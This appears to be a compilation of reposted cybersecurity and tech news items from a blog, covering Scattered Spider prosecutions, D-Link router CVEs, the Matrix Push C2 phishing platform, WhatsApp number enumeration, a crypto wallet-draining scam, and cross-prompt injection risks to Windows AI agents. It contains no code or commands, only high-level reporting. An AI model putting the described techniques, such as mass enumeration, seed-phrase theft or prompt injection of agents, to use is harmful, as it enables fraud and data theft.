The social media ban is an attempt to reduce online harms and negative impact on children's mental health. The government hopes that the measures help to cut out cyberbullying too. It will be interesting to see what impact this has on the lives of kids in the country. Will they start playing outside more like kids growing up in the 1990s and 2000s or will they turn to artificial intelligence and have an unhealthy relationship with a large language model? Only time will tell.

Source: BBC News

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Saturday 22 November 2025 at 4:18 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

Believed to be members of the Scattered Spider hacking collective, 19-year-old Thalha Jubair from east London and 18-year-old Owen Flowers from Walsall were arrested at their homes in September 2024 by officers from the UK National Crime Agency (NCA) and the City of London Police.

Flowers was also arrested for his alleged involvement in the TfL attack in September 2024, but was released on bail after being questioned by NCA officers.

According to a Sky News report, Jubair and Flowers have now pleaded not guilty to computer misuse and fraud-related charges at Southwark Crown Court. The charges allege the defendants caused "or creating a significant risk of, serious damage to human welfare and intending to cause such damage or being reckless as to whether such damage was caused."

TfL disclosed the August 2024 breach on September 2, 2024, stating that it had found no evidence that customer data was compromised. While this attack did not affect London's transportation services, it disrupted online services and internal systems, as well as the public transportation agency's ability to process refunds.

In a subsequent update, TfL revealed that customer data, including names, addresses, and contact details, was actually compromised during the incident. TfL provides transportation services to more than 8.4 million Londoners through its surface, underground, and Crossrail systems, which are jointly managed with the UK's Department for Transport.

Flowers is also facing charges involving conspiring to attack the networks of SSM Health Care Corporation and Sutter Health in the United States, while Jubair is separately charged with failing to disclose passwords seized from him in March 2025.

"This attack caused significant disruption and millions in losses to TfL, part of the UK's critical national infrastructure," said Paul Foster, the head of the NCA's National Cyber Crime Unit, in September. "Earlier this year, the NCA warned of an increase in the threat from cyber criminals based in the UK and other English-speaking countries, of which Scattered Spider is a clear example."

In September, the U.S. Department of Justice also charged Jubair with conspiracy to commit computer fraud, money laundering, and wire fraud. These charges relate to at least 120 incidents of network breaches between May 2022 and September 2025, affecting at least 47 U.S. organizations and including extortion attempts worldwide and attacks on critical infrastructure entities and U.S. courts.

According to court documents, victims have paid Jubair and his accomplices over $115 million in ransom payments.

In July, the NCA arrested four other suspected members of the Scattered Spider cybercrime collective, believed to be linked to cyberattacks against major retailers in the country, including Marks & Spencer, Harrods, and Co-op.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Saturday 22 November 2025 at 4:17 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

On 10 November, hackers gained access to a Princeton University database containing the personal information of those in the institution’s community, including alumni, donors and students. In October, similar data breaches occurred at the University of Pennsylvania in Philadelphia and Harvard University in Cambridge, Massachusetts.

These incidents are part of a broader trend. Over the past few years, cyberattacks have been on the rise at academic institutions around the globe. Not only are attacks time-consuming and costly to contain and clean up, but they have also caused university employees to lose access to essential digital services, such as e-mail and research software, for weeks — or even months — at a time.

“The number of cyberattacks is not relenting,” says Harjinder Singh Lallie, a cybersecurity specialist at the University of Warwick, UK.

Universities have been working to implement more robust security systems, but specialists say that academic institutions need to do more to shore up defences, especially against attacks that are assisted by artificial intelligence (AI), which might enable hackers to conduct breaches with greater speed and ease.

Toby Murray, a cybersecurity researcher at the University of Melbourne in Australia, says that in today’s political climate, in which competition between countries has been on the rise, “universities remain a really attractive target”. It’s often difficult to trace where attacks come from, but some have been traced to state-sponsored groups, and often involve the use of ransomware, malicious software that blocks data or systems until a payment is made.

What makes universities vulnerable?

Across all sectors, from government organizations to private companies, cyberattacks have been increasing. Specialists say that universities are particularly vulnerable because of the valuable data they house, such as employee records and intellectual property, and because these institutions are difficult to secure. Many universities have older, outdated security systems as well as diverse digital infrastructures and communities that can make it easy for hackers to infiltrate such systems.

“It’s going to get worse,” says David Batho, the director of security at Jisc, an organization that provides digital infrastructure to educational institutions in the United Kingdom. “Prevention is no longer enough. Building resilience is essential.”

A UK government survey carried out between August and December last year, revealed that the country’s educational institutions have had a high prevalence of cybersecurity breaches and were more likely to experience such incidents than were other businesses. According to an accompanying report, 91% of higher education institutions and 85% of further education colleges reported having experienced such an incident in the past 12 months.

Source

There were more than 19,500 reports of issues with the social media platform, as of 10:51 a.m. ET, according to Downdetector, which tracks outages by collating status reports from a number of sources.

Source

The malicious C2 platform, discovered by BlackFrog, tricks users with fake system notifications, redirecting them to malicious sites, monitoring infected clients in real time, and even scanning for cryptocurrency wallets.

In a report published on November 20, BlackFrog outlined how Matrix Push C2 abuses the legitimate web browser push notification system as a C2 channel.

Matrix Push C2 works by first tricking users into allowing browser notifications, often via social engineering on malicious or compromised websites. Once a user is subscribed to the attacker’s notifications a direct line to that user’s desktop or mobile device is created via the browser.

The cybercriminals then push out legitimate-looking error messages and security alerts that appear as if they are from the operating system or trusted software.

However, if a victim clicks on these fake notifications, they are taken to a site run by the attack, often a phishing page or a malware download.

BlackFrog described this attack as ‘fileless’ because the interaction is happening through the browser’s notifications system, therefore there is no need for a traditional malware file to be present on the system initially.

Matrix Push C2 Platform Details

The attack is orchestrated via a web-based dashboard provided by the Matrix Push C2 platform. 

The threat is not limited to a single operating system (Windows, Mac, Linux, Android, etc.) because it operates through standard browser technology, noted BlackFrog.

The campaign dashboard, which is part of Matrix Push C2, shows an active client panel. This gives the attacker detailed information on each victim in real time.

“This real-time intelligence is part of what makes Matrix Push C2 so dangerous. The attacker isn’t firing blind phishing emails hoping someone clicks, they have a live connection to the victim’s browser,” said BlackFrog.

Matrix Push C2 also includes analytics and link management tools so the attacker can measure how effective their campaign is and adjust tactics.

For the social engineering element of the attack, Matrix Push C2 comes with configurable templates to maximize the credibility of its fake messages.

“In the settings, we found templates for brands such as MetaMask, Netflix, Cloudflare, PayPal, TikTok and more, each designed to look like a legitimate notification or security page from those providers,” the BlackFrog report noted.

Further, the attacker can generate short, innocuous URLs (under a path they control) that redirect to the real malicious site. This helps evade filters and lowers victims’ skepticism that comes with sending long, suspicious-looking links.

To counter this threat, BlackFrog recommended using anti data exfiltration (ADX) technology, focused on blocking outbound traffic.

Source

•     High-severity Windows kernel race condition can let low-privilege local users gain full admin rights.
•     Exploit requires local access (compromised account or malware); not remotely exploitable.
•     Microsoft released patches — update Windows immediately to block privilege escalation.

It's always bad when a new security issue pops up, and it's even worse when it affects multiple builds across multiple versions of an operating system. A lot of Windows users are being affected by a brand new security flaw, and this one looks pretty bad.

The Indian Computer Emergency Response Team (CERT-In), the national nodal agency in India for responding to computer security incidents, has released a detailed advisory regarding a flaw that affects a broad spectrum of Windows versions, including the most recent builds of Windows 11 and Windows Server. The agency has classified the issue as "high severity," and from what we can see, it's pretty bad.

According to the technical details provided by CERT-In, the flaw is at a kernel level and it's caused by a "race condition." In case you don't know what that is, a race condition occurs when a system attempts to perform two or more operations at the same time, but because of the nature of the device or software, the operations must be done in the proper sequence to be done correctly. When a system fails to manage these simultaneous requests to share resources, it creates a temporary gap in security logic. The Windows kernel seemingly fails to properly synchronize processes. And if an attacker can manipulate this confusion, they can bypass security protocols that usually segregate standard user activities from critical system functions.

To exploit this, a threat actor requires low-level access to the target system, so this isn't something that can be exploited remotely. This could be achieved through a compromised guest account, a standard employee login, or even malware that has already infected the machine with low-level permissions. But once the attacker triggers the race condition in the kernel, they can elevate their privileges from a restricted user to a full administrator. From there, they can do stuff such as manipulate or delete critical data, install persistent malware, ransomware, or keyloggers, or create new administrator accounts to maintain access.

Microsoft has acknowledged the vulnerability and has successfully deployed security patches to address the flaw, so make sure your PC is fully updated.

Source

Technical details and proof-of-concept (PoC) exploit code demonstrating the vulnerabilities have been published by a researcher using the name Yangyifan.

Typically used in homes and small offices, the DIR-878 was hailed as a high-performance dual-band wireless router when it launched in 2017.

Even if the device is no longer supported, it can still be purchased new or used for prices between $75 and $122.

However, as DIR-878 has reached end-of-life (EoL) in 2021, D-Link warned that it will not release security updates for this model and recommends replacing it with an actively supported product.

In total, D-Link's security advisory lists four vulnerabilities, only one of them requiring physical access or control over a USB device for exploitation.

• CVE-2025-60672 – Remote unauthenticated command execution via SetDynamicDNSSettings parameters stored in NVRAM and used in system commands.
• CVE-2025-60673 – Remote unauthenticated command execution via SetDMZSettings and unsanitized IPAddress value injected into iptables commands.
• CVE-2025-60674 – Stack overflow in USB storage handling due to oversized “Serial Number” field (physical or USB-device-level attack).
• CVE-2025-60676 – Arbitrary command execution via unsanitized fields in /tmp/new_qos.rule, processed by binaries using system().

Despite being remotely exploitable, and exploit code already publicly available, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has assessed that the vulnerabilities have a medium-severity score.

However, a publicly available exploit typically captures threat actors' attention, especially botnet operators, who usually include them in their arsenal to expand targeting.

For instance, the large-scale botnet RondoDox uses more than 56 known flaws, some affecting D-Link devices, and keeps adding more of them.

More recently, BleepingComputer reported on the Aisuru botnet, which launched a massive distributed denial-of-service (DDoS) attack against Microsoft's Azure network, sending 15.72 terabits per second (Tbps) from over 500,000 IP addresses.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Friday 21 November 2025 at 3:42 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

Tom Warren

Microsoft has been adding AI features to Windows 11 for years, but things have recently entered a new phase, with both generative and so-called “agentic” AI features working their way deeper into the bedrock of the operating system. A new build of Windows 11 released to Windows Insider Program testers yesterday includes a new “experimental agentic features” toggle in the Settings to support a feature called Copilot Actions, and Microsoft has published a detailed support article detailing more about just how those “experimental agentic features” will work.

If you’re not familiar, “agentic” is a buzzword that Microsoft has used repeatedly to describe its future ambitions for Windows 11—in plainer language, these agents are meant to accomplish assigned tasks in the background, allowing the user’s attention to be turned elsewhere. Microsoft says it wants agents to be capable of “everyday tasks like organizing files, scheduling meetings, or sending emails,” and that Copilot Actions should give you “an active digital collaborator that can carry out complex tasks for you to enhance efficiency and productivity.”

But like other kinds of AI, these agents can be prone to error and confabulations and will often proceed as if they know what they’re doing even when they don’t. They also present, in Microsoft’s own words, “novel security risks,” mostly related to what can happen if an attacker is able to give instructions to one of these agents. As a result, Microsoft’s implementation walks a tightrope between giving these agents access to your files and cordoning them off from the rest of the system.

Possible risks and attempted fixes

For example, AI agents running on a PC will be given their own user accounts separate from your personal account, ensuring that they don’t have permission to change everything on the system and giving them their own “desktop” to work with that won’t interfere with what you’re working with on your screen. Users need to approve requests for their data, and “all actions of an agent are observable and distinguishable from those taken by a user.” Microsoft also says agents need to be able to produce logs of their activities and “should provide a means to supervise their activities,” including showing users a list of actions they’ll take to accomplish a multi-step task.

But these safeguards and monitoring capabilities don’t change the fact that you’re exposing yourself to privacy and security risks by using AI agents. They’ll be able to request read and write access to most of the files in your user account—by default, anything in the Documents, Downloads, Desktop, Music, Pictures, and Videos folders. They’ll have access to any apps that have been installed for all users on the PC (apps that have only been installed in your user account won’t be accessible to the agent, and it will also be possible for users to install apps that only their agents can access.) And agents can potentially be vulnerable to hijacking that exposes your data to attackers—Microsoft specifically mentions “cross-prompt injection (XPIA), where malicious content embedded in UI elements or documents can override agent instructions, leading to unintended actions like data exfiltration or malware installation.”

For now, these features can be switched off with the Settings toggle and are off by default. That concession to user preference—plus the lengthy support document outlining the risks and the precautions Microsoft has tried to build into the system—at least suggests that Microsoft has learned lessons from its botched rollout of the data-scraping Windows Recall feature last year.

Hopefully these features remain fully off by default when they start rolling out to the general public. If not, they risk becoming one more of the many things you need to change or turn off in a modern Windows 11 installation if you want to keep the operating system’s various cloud and AI offerings out of your way.

Alongside these upcoming AI agents, Microsoft is also attempting to make Copilot more “human-centered” and approachable, adding a Clippy-esque animated character named “Mico” and improving its ability to understand voice input as well as typical mouse-and-keyboard requests.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 19 November 2025 at 4:36 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

WhatsApp's mass adoption stems in part from how easy it is to find a new contact on the messaging platform: Add someone's phone number, and WhatsApp instantly shows whether they're on the service, and often their profile picture and name, too.

Repeat that same trick a few billion times with every possible phone number, it turns out, and the same feature can also serve as a convenient way to obtain the cell number of virtually every WhatsApp user on earth—along with, in many cases, profile photos and text that identifies each of those users. The result is a sprawling exposure of personal information for a significant fraction of the world population.

One group of Austrian researchers have now shown that they were able to use that simple method of checking every possible number in WhatsApp's contact discovery to extract 3.5 billion users’ phone numbers from the messaging service. For about 57 percent of those users, they also found that they could access their profile photos, and for another 29 percent, the text on their profiles. Despite a previous warning about WhatsApp's exposure of this data from a different researcher in 2017, they say, the service's parent company, Meta, still failed to limit the speed or number of contact discovery requests the researchers could make by interacting with WhatsApp's browser-based app, allowing them to check roughly a hundred million numbers an hour.

The result would be “the largest data leak in history, had it not been collated as part of a responsibly conducted research study,” as the researchers describe it in a paper documenting their findings.

“To the best of our knowledge, this marks the most extensive exposure of phone numbers and related user data ever documented,” says Aljosha Judmayer, one of the researchers at the University of Vienna who worked on the study.

The researchers say they warned Meta about their findings in April and deleted their copy of the 3.5 billion phone numbers. By October, the company had fixed the enumeration problem by enacting a stricter “rate-limiting” measure that prevents the mass-scale contact discovery method the researchers used. But until then, the data exposure could have also been exploited by anyone else using the same scraping technique, adds Max Günther, another researcher from the university who cowrote the paper. “If this could be retrieved by us super easily, others could have also done the same," he says.

In a statement to WIRED, Meta thanked the researchers, who reported their discovery through Meta's “bug bounty” system, and described the exposed data as “basic publicly available information,” since profile photos and text weren't exposed for users who opted to make it private. “We had already been working on industry-leading anti-scraping systems, and this study was instrumental in stress-testing and confirming the immediate efficacy of these new defenses,” writes Nitin Gupta, vice president of engineering at WhatsApp. Gupta adds, “We have found no evidence of malicious actors abusing this vector. As a reminder, user messages remained private and secure thanks to WhatsApp’s default end-to-end encryption, and no non-public data was accessible to the researchers.”

Despite Meta's description, the researchers say they didn't circumvent or even encounter any “defenses” in collecting the phone numbers. Nor is their work the first time that WhatsApp has been warned about its exposure of phone numbers and associated profile data. Fully eight years ago, in 2017, Dutch researcher Loran Kloeze wrote a blog post pointing out that the phone number enumeration technique was possible and that it could be used to obtain phone numbers, profile photos, and also the times when a user was online.

Kloeze described a scenario in which the data exposure could be combined with face recognition to create a giant database of personally identifiable information. “Now that is quite scary, isn’t it?” he wrote. Meta, then Facebook, responded to his findings, arguing that WhatsApp's privacy settings were still working as designed—users can choose to make their profile information accessible only to their chosen contacts—and even told him he wasn’t eligible for a bug bounty reward for his work at the time.

When WIRED asked Meta what rate-limiting measures it instituted over the last eight years to prevent the technique Kloeze demonstrated, the company responded that it has, in fact, implemented evolving defenses against scrapers, including rate-limiting and machine-learning techniques to ban scrapers. Yet the University of Vienna researchers were able to not only replicate Kloeze's work, but take it further, actually enumerating all 3.5 billion registered WhatsApp phone numbers—far more than the service had in 2017. They also addressed WhatsApp's argument about privacy settings by measuring how many users publicly exposed personal information in their profiles, breaking down the results by country. They found that 44 percent of the 137 million phone numbers they collected for Americans displayed photos, and 33 percent showed public “about” text, for instance.

For countries where WhatsApp is even more widely used, a smaller fraction of the population turned on its privacy settings: In India, where the researchers counted nearly 750 million numbers, 62 percent of accounts publicly displayed a profile photo. For the 206 million Brazilian numbers they found, 61 percent had profile photos exposed.

The University of Vienna researchers stumbled on WhatsApp's phone number enumeration problem last year, when they were testing what they could learn from the service about users despite its end-to-end encryption for messages, such as the times when a user is connecting from the desktop app versus the mobile one. They found that the app didn't appear to have any obvious rate-limiting protection, so they tried simply enumerating all US numbers. “In a half hour, we had like 30 million US-based numbers,” says Gabriel Gegenhuber, one of the University of Vienna researchers. “So we were kind of surprised. And then we just kept going.”

One interested audience for the exposed phone number data, the researchers point out, would be scammers and spammers who are seeking a database of potential targets. But the researchers also found millions of phone numbers registered to WhatsApp in countries where it's officially banned, including 2.3 million in China and 1.6 million in Myanmar. Those countries' governments could have used WhatsApp's exposure to collect those numbers and hunt down illegal app users, the researchers point out. Muslims in China, according to some reports, have been detained merely for having WhatsApp installed on their phones.

The University of Vienna researchers also analyzed the cryptographic keys for the 3.5 billion accounts they found exposed via their enumeration method, the long strings of characters used to receive encrypted messages in WhatsApp's end-to-end encryption protocol. They found that a surprising number of accounts used duplicate keys—a security issue given that anyone who has the same key as another user would also be able to decrypt messages sent to them.

Some keys were reused hundreds of times, they found, and 20 US numbers used a key of all zeroes, strangely. The researchers speculate, though, that the key duplication was likely the result of unauthorized WhatsApp clients, rather than a flaw in WhatsApp itself. On closer examination of some of the accounts with repeated cryptographic keys, they also noted that they looked like scammer accounts, suggesting that some scam operations that exploit WhatsApp may use a client with broken encryption features.

Aside from the lack of rate limiting, the researchers argue that their findings point to a more fundamental issue with services like WhatsApp: Phone numbers, they say, don't actually have enough randomness to be used as a unique identifier for a service with billions of users. That leaves rate-limiting as the only available measure to prevent user data from being scraped en masse, and one that will never be fully secure against privacy leaks if WhatsApp prioritizes convenient contact discovery for users. (WhatsApp has, in fact, started testing a username feature in beta, which may offer a better approach to privacy.)

“Phone numbers were not designed to be used as secret identifiers for accounts, but that's how they're used in practice,” says Judmayer. “If you have a big service that's used by more than a third of the world population, and this is the discovery mechanism, that's a problem.”

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 19 November 2025 at 5:48 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

UPDATE 11:25AM: Cloudflare's CTO is blaming "a latent bug in a service underpinning our bot mitigation capability" for today's outage. It "started to crash after a routine configuration change we made," which "cascaded into a broad degradation to our network and other services."

Dane Knecht stressed that this was "not an attack," and "work is already underway to make sure it does not happen again." He promised to share more details in a few hours.

"I won’t mince words: earlier today we failed our customers and the broader Internet when a problem in @Cloudflare network impacted large amounts of traffic that rely on us," he added. "The sites, businesses, and organizations that rely on Cloudflare depend on us being available and I apologize for the impact that we caused."

UPDATE 9:50AM: "A fix has been implemented and we believe the incident is now resolved. We are continuing to monitor for errors to ensure all services are back to normal," Cloudflare says.

UPDATE 9AM: Cloudflare says a "fix is being implemented" for the issue causing outages. "We are continuing to monitor for errors to ensure all services are back to normal," it said at 8:10 a.m. EST.

Still, as more people wake up and try to sign on to various platforms, reports on Downdetector have increased substantially. Users are having issues on Canva, ChatGPT, Claude, Doordash, Grindr, Indeed, Truth Social, Uber, X, Zoom, and more. It's not confirmed that all of these issues are Cloudflare-related, but it's likely, as many reports spiked around 8:30 a.m. EST.

"We are continuing [to work] on restoring service for application services customers," Cloudflare said at 8:59 a.m. EST.

Original Story:

Struggling to access websites or apps? It may be because of an outage of Cloudflare services, which is impacting third-party tools like ChatGPT and X.

As reported by users on Downdetector, Cloudflare first experienced issues at 6:15 a.m. EST on Tuesday, Nov. 18. The brand acknowledged problems, saying, “Cloudflare is aware of, and investigating an issue which impacts multiple customers.”

Many websites have widespread 500 errors. So far, outages are confirmed for social media network X, OpenAI's ChatGPT, and film review platform Letterboxd. 

On its status website, OpenAI said, "We have confirmed that the incident is caused by an issue with one of our third-party service providers. We will provide updates as they become available." There are also issues with its APIs and video-generation platform Sora.

At 7:20 a.m. EST, Cloudflare announced that it was beginning to see services recover, although it noted, “Customers may continue to observe higher-than-normal error rates as we continue remediation efforts.” The brand has since said it is "continuing to investigate this issue."

Last month, a major Amazon Web Services outage saw over 2,000 websites and apps taken offline for hours. The brand later confirmed that the issues stemmed from a “latent defect” in its largest cluster of data centers, called US-East-1.

Spotify’s mobile app has also been experiencing issues today, with some users finding that playing a podcast makes both the Android and iOS apps crash.

Source

As Kent Halliburton stood in a bathroom at the Rosewood Hotel in central Amsterdam, thousands of miles from home, running his fingers through an envelope filled with €10,000 in crisp banknotes, he started to wonder what he had gotten himself into.

Halliburton is the cofounder and CEO of Sazmining, a company that operates bitcoin mining hardware on behalf of clients—a model known as “mining-as-a-service.” Halliburton is based in Peru, but Sazmining runs mining hardware out of third-party data centers across Norway, Paraguay, Ethiopia, and the United States.

As Halliburton tells it, he had flown to Amsterdam the previous day, August 5, to meet Even and Maxim, two representatives of a wealthy Monaco-based family. The family office had offered to purchase hundreds of bitcoin mining rigs from Sazmining—around $4 million worth—which the company would install at a facility currently under construction in Ethiopia. Before finalizing the deal, the family office had asked to meet Halliburton in person.

When Halliburton arrived at the Rosewood Hotel, he found Even and Maxim perched in a booth. They struck him as playboy, high-roller types—particularly Maxim, who wore a tan three-piece suit and had a highly manicured look, his long dark hair parted down the middle. A Rolex protruded from the cuff of his sleeve.

Over a three-course lunch—ceviche with a roe garnish, Chilean sea bass, and cherry cake—they discussed the contours of the deal and traded details about their respective backgrounds. Even was talkative and jocular, telling stories about blowout parties in Marrakech. Maxim was aloof; he mostly stared at Halliburton, holding his gaze for long periods at a time as though sizing him up.

As a relationship-building exercise, Even proposed that Halliburton sell the family office around $3,000 in bitcoin. Halliburton was initially hesitant, but chalked it up as a peculiar dating ritual. One of the guys slid Halliburton the cash-filled envelope and told him to go to the bathroom, where he could count out the amount in private. “It felt like something out of a James Bond movie,” says Halliburton. “It was all very exotic to me.”

Halliburton left in a taxi, somewhat bemused by the encounter, but otherwise hopeful of closing the deal with the family office. For Sazmining, a small company with around 15 employees, it promised to be transformative.

Less than two weeks later, Halliburton had lost more than $200,000 worth of bitcoin to Even and Maxim. He didn’t know whether Sazmining could survive the blow, nor how the scammers had ensnared him.

Directly after his lunch with Even and Maxim, Halliburton flew to Latvia for a Bitcoin conference. From there, he traveled to Ethiopia to check on construction work at the data center facility.

While Halliburton was in Ethiopia, he received a WhatsApp message from Even, who wanted to go ahead with the deal on one condition: that Sazmining sell the family office a larger amount of bitcoin as part of the transaction, after the small initial purchase at the Rosewood Hotel. They landed on $400,000 worth—a tenth of the overall deal value.

Even asked Halliburton to return to Amsterdam to sign the contracts necessary to finalize the deal. Having been away from his family for weeks, Halliburton protested. But Even drew a line in the sand: “Remotely doesn’t work for me that’s not how I do business at the moment,” he wrote in a text message reviewed by WIRED.

Halliburton arrived back in Amsterdam in the early afternoon on August 16. That evening, he was due to meet Maxim at a teppanyaki restaurant at the five-star Okura Hotel. The interior is elaborately decorated in traditional Japanese style; it has wooden panelling, paper walls, a zen garden, and a flock of origami cranes that hang from string down a spiral staircase in the lobby.

Halliburton found Maxim sitting on a couch in the waiting area outside the restaurant, dressed in a gaudy silver suit. As they waited for a table, Maxim asked Halliburton whether he could demonstrate that Sazmining held enough bitcoin to go through with the side transaction that Even had proposed. He wanted Halliburton to move roughly half of the agreed amount—worth $220,000—into a bitcoin wallet app trusted by the family office. The funds would remain under Halliburton’s control, but the family office would be able to verify their existence using public transaction data.

Halliburton thumbed open his iPhone. The app, Atomic Wallet, had thousands of positive reviews and had been listed on the Apple App Store for several years. With Maxim at his side, Halliburton downloaded the app and created a new wallet. “I was trying to earn this guy’s trust,” says Halliburton. “Again, a $4 million contract. I’m still looking at that carrot.”

The dinner passed largely without incident. Maxim was less guarded this time; he talked about his fondness for watches and his work sourcing deals for the family office. Feeling under the weather from all the travel, Halliburton angled to wrap things up.

They left with the understanding that Maxim would take the signed contracts to the family office to be executed, while Halliburton would send the $220,000 in bitcoin to his new wallet address as agreed.

Back in his hotel room, Halliburton triggered a small test transaction using his new Atomic Wallet address. Then he wiped and reinstated the wallet using the private credentials—the seed phrase—generated when he first downloaded the app, to make sure that it functioned as expected. “Had to take some security measures but almost ready. Thanks for your patience,” wrote Halliburton in a WhatsApp message to Even. “No worries take your time,” Even responded.

At 10:45 pm, satisfied with his tests, Halliburton signaled to a colleague to release $220,000 worth of bitcoin to the Atomic Wallet address. When it arrived, he sent a screenshot of the updated balance to Even. One minute later, Even wrote back, “Thank yiu [sic].”

Halliburton sent another message to Even, asking about the contracts. Though previously quick to answer, Even didn’t respond. Halliburton checked the Atomic Wallet app, sensing that something was wrong. The bitcoin had vanished.

Halliburton’s stomach dropped. As he sat on the bed, he tried to stop himself from vomiting. “It was like being punched in the gut,” says Halliburton. “It was just shock and disbelief.”

Halliburton racked his brain trying to figure out how he had been swindled. At 11:30 pm, he sent another message to Even: “That was the most sophisticated scam I’ve ever experienced. I know you probably don’t give a shit but my business may not survive this. I’ve worked four years of my life to build it.”

Even responded, denying that he had done anything wrong, but that was the last Halliburton heard from him. Halliburton provided WIRED with the Telegram account Even had used; it was last active on the day the funds were drained. Even did not respond to a request for comment.

Within hours, the funds drained from Halliburton’s wallet began to be divided up, shuffled through a web of different addresses, and deposited with third-party platforms for converting crypto into regular currency, analysis by blockchain analytics companies Chainalysis and CertiK shows.

A portion of the bitcoin was split between different instant exchangers, which allow people to swap one type of cryptocurrency for another almost instantaneously. The bulk was funneled into a single address, where it was blended with funds tagged by Chainalysis as the likely proceeds of rip deals, a scam whereby somebody impersonates an investor to steal crypto from a startup.

“There’s nothing illegal about the services the scammer leveraged,” says Margaux Eckle, senior investigator at Chainalysis. “However, the fact that they leveraged consolidation addresses that appear very tightly connected to labeled scam activity is potentially indicative of a fraud operation.”

Some of the bitcoin that passed through the consolidation address was deposited with a crypto exchange, where it was likely swapped for regular currency. The remainder was converted into stablecoin and moved across so-called bridges to the Tron blockchain, which hosts several over-the-counter trading services that can be readily used to cash out large quantities of crypto, researchers claim.

The effect of the many hops, shuffles, conversions, and divisions is to make it more difficult to trace the origin of funds, so that they can be cashed out without arousing suspicion. “The scammer is quite sophisticated,” says Eckle. “Though we can trace through a bridge, it’s a way to slow the tracing of funds from investigators that could be on your tail.”

Eventually, the trail of public transaction data stops. To identify the perpetrators, law enforcement would have to subpoena the services that appear to have been used to cash out, which are widely required to collect information about users.

From the transaction data, it’s not possible to tell precisely how the scammers were able to access and drain Halliburton’s wallet without his permission. But aspects of his interactions with the scammers provide some clue.

Initially, Halliburton wondered whether the incident might be connected to a 2023 hack perpetrated by threat actors affiliated with the North Korean government, which led to $100 million worth of funds being drained from the accounts of Atomic Wallet users. (Atomic Wallet did not respond to a request for comment.)

But instead, the security researchers that spoke to WIRED believe that Halliburton fell victim to a targeted surveillance-style attack. “Executives who are publicly known to custody large crypto balances make attractive targets,” says Guanxing Wen, head of security research at CertiK.

The in-person dinners, expensive clothing, reams of cash and other displays of wealth were gambits meant to put Halliburton at ease, researchers theorize. “This is a well-known rapport-building tactic in high-value confidence schemes,” says Wen. “The longer a victim spends with the attacker in a relaxed setting, the harder it becomes to challenge a later technical request.”

In order to complete the theft, the scammers likely had to steal the seed phrase for Halliburton’s newly created Atomic Wallet address. Equipped with a wallet’s seed phrase, anyone can gain unfettered access to the bitcoin kept inside.

One possibility is that the scammers, who dictated the locations for both meetings in Amsterdam, hijacked or mimicked the hotel Wi-Fi networks, allowing them to harvest information from Halliburton’s phone. “That equipment you can buy online, no problem. It would all fit inside a couple of suitcases,” says Adrian Cheek, lead researcher at cybersecurity company Coeus. But Halliburton insists that his phone never left his possession, and he used mobile data to download the Atomic Wallet app, not public Wi-Fi.

The most plausible explanation, claims Wen, is that the scammers—perhaps with the help of a nearby accomplice or a camera equipped with long-range zoom—were able to record the seed phrase when it appeared on Halliburton’s phone at the point he first downloaded the app, on the couch at the Okura Hotel.

Long before Halliburton delivered the $220,000 in bitcoin to his Atomic Wallet address, the scammers had probably set up a “sweeper script,” claims Wen, a type of automated bot coded to drain a wallet when it detects a large balance change.

The people the victim meets in-person in cases like this—like Even and Maxim—are rarely the ultimate beneficiaries, but rather mercenaries hired by a network of scam artists, who could be based on the other side of the globe.

“They’re normally recruited through underground forums, and secure chat groups,” says Cheek. “If you know where you’re looking, you can see this ongoing recruitment.”

For a few days, it remained unclear whether Sazmining would be able to weather the financial blow. The stolen funds equated to about six weeks worth of revenue. “I’m trying to keep the business afloat and survive this situation where suddenly we’ve got a cash crunch,” says Halliburton. By delaying payment to a vendor and extending the duration of an outstanding loan, the company was ultimately able to remain solvent.

That week, one of the Sazmining board members filed reports with law enforcement bodies in the Netherlands, the UK, and the US. They received acknowledgements from only UK-based Action Fraud, which said it would take no immediate action, and the Cyber Fraud Task Force, a division of the US Secret Service. (The CFTF did not respond to a request for comment.)

The incredible volume of crypto-related scam activity makes it all but impossible for law enforcement to investigate each theft individually. “It’s a type of threat and criminal activity that is reaching a scale that’s completely unprecedented,” says Eckle.

The best chance of a scam victim recovering their funds is for law enforcement to bust an entire scam ring, says Eckle. In that scenario, any funds recovered are typically dispersed to those who have reported themselves victims.

Until such a time, Halliburton has to make his peace with the loss. “It’s still painful,” he says. But “it wasn’t a death blow.”

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Tuesday 18 November 2025 at 2:41 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

LinkedIn in particular has become a hotbed for phishing attacks, and for good reason. Attackers are running sophisticated spear-phishing attacks against company executives, with recent campaigns seen targeting enterprises in financial services and technology verticals.

But phishing outside of email remains severely underreported — not exactly surprising when we consider that most of the industry's phishing metrics come from email security tools.

Your initial thought might be "why do I care about employees getting phished on LinkedIn?" Well, while LinkedIn is a personal app, it's routinely used for work purposes, accessed from corporate devices, and attackers are specifically targeting business accounts like Microsoft Entra and Google Workspace.

So, LinkedIn phishing is a key threat that businesses need to be prepared for today. Here's 5 things you need to know about why attackers are going phishing on LinkedIn — and why it's so effective.

1: It bypasses traditional security tools

LinkedIn DMs completely sidestep the email security tools that most organizations rely on for phishing protection. In practice, employees access LinkedIn on work laptops and phones, but security teams have no visibility into these communications. This means that employees can be messaged by outsiders on their work devices without any risk of email interception.

To make matters worse, modern phishing kits use an array of obfuscation, anti-analysis, and detection evasion techniques to get around anti-phishing controls based on the inspection of a webpage (such as web crawling security bots), or analysis of web traffic (such as a web proxy). This leaves most organizations left relying on user training and reporting as their main line of defense — not a great situation.

